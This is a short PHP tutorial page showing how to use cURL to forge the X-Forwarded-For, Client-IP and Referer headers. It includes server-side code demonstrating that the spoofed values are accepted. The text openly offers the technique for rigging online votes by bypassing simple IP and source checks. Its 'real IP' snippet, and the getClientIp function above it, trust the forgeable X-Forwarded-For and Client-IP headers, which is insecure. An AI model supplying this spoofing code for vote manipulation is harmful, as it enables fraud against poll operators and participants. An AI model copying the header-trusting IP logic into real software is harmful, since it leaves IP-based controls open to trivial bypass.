Home  >  Article  >  Backend Development  >  Use CURL to forge source URLs and IP_PHP tutorial

Use CURL to forge source URLs and IP_PHP tutorial

WBOY
WBOYOriginal
2016-07-13 10:33:321090browse

Many votes have to verify the URL and IP of the source, but using CURL, you can forge any URL and IP to bypass some simple verifications. Here is a simple example.

Before running the program, please make sure extension=php_curl.dll in php.ini is not commented out.

test.php

<?php
	$ch = curl_init();  
	curl_setopt($ch, CURLOPT_URL, "http://localhost/test_2.php");  
	curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:8.8.8.8', 'CLIENT-IP:8.8.8.8'));  //构造IP  
	curl_setopt($ch, CURLOPT_REFERER, "http://www.bkjia.com/ ");   //构造来路  
	curl_setopt($ch, CURLOPT_HEADER, 1);  
	$out = curl_exec($ch);  
	curl_close($ch); 
?>

test.php will send a request to test_2.php.

<?php
	function getClientIp() {  
		if (!empty($_SERVER["HTTP_CLIENT_IP"]))  
			$ip = $_SERVER["HTTP_CLIENT_IP"];  
		else if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))  
			$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];  
		else if (!empty($_SERVER["REMOTE_ADDR"]))  
			$ip = $_SERVER["REMOTE_ADDR"];  
		else  
			$ip = "err";  
		return $ip;  
	}
	  
	echo "<br />IP: " . getClientIp() . "";  
	echo "<br />referer: " . $_SERVER["HTTP_REFERER"]; 
?>

The results of running the program are as follows:

HTTP/1.1 200 OK Date: Tue, 01 Nov 2011 12:20:06 GMT 
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 
OpenSSL/0.9.8i PHP/5.2.9 X-Powered-By: PHP/5.2.9 
Content-Length: 53 Content-Type: text/html 
IP: 8.8.8.8
referer: http://www.bkjia.com/

As you can see, the IP and address can be changed at will. For many voting functions with imperfect voting mechanisms, you can use this to brush votes.

By the way, about the real IP.

Generally, the environment variable $_SERVER['REMOTE_ADDR'] is used to obtain the user's IP. However, this variable only records the last host IP. Therefore, when the user's browser has a Proxy set, his real IP cannot be obtained. .

At this time, you can use another environment variable $_SERVER['HTTP_X_FORWARDED_FOR']. It will record the host IP passed by, but it will only be generated when the user uses a Proxy, so you can write it like the following to get it. or the real IP.

<?php  
if ( empty( $_SERVER['HTTP_X_FORWARDED_FOR'])) 
{  
	$myip = $_SERVER['REMOTE_ADDR'];  
} 
else  
{  
    $myip = explode( ',' , $_SERVER['HTTP_X_FORWARDED_FOR']);  
    $myip = $myip [0];  
}  
echo $myip;  
?>  

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/752466.htmlTechArticleMany votes have to verify the URL and IP of the source, but using CURL can be forged into any URL and IP to bypass some simple verification. Here is a simple example. Program...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn